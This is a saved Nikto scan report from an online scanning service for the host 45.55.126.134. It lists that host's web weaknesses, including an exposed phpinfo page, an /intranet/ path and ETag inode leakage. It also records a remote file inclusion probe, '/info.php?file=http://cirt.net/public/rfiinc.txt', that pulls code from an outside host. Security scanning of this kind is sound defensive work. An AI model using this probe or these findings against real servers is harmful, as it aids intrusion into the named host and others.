Scan report for "45.55.126.134"

Membership level: Free member
Summary

Found

7

Duration

24sec

Date

2024-10-15

IP

45.55.126.134

Report
Nikto scan (max 60 sec) (nikto -host 45.55.126.134 -maxtime 60)
- Nikto 
---------------------------------------------------------------------------
+ Target IP:          45.55.126.134
+ Target Hostname:    45.55.126.134
+ Target Port:        80
+ Start Time:         2024-10-15 13:34:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.62 (Debian)
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 47d9, size: 612759c069ee5, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /intranet/: This might be interesting.
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /info.php?file=http://cirt.net/public/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8101 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-10-15 13:34:52 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.62) are not in
      the Nikto 2.5.0 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
Detailed report
Target
45.55.126.134
Target IP
45.55.126.134
Scan method
Nikto scan (max 60 sec)
Run command
nikto -host 45.55.126.134 -maxtime 60
Duration
Quick report
Scan date
15 Oct 2024 13:34
Copy scan report
Download report
Remove scan result
$
Total scans
Check ports
API - Scan ID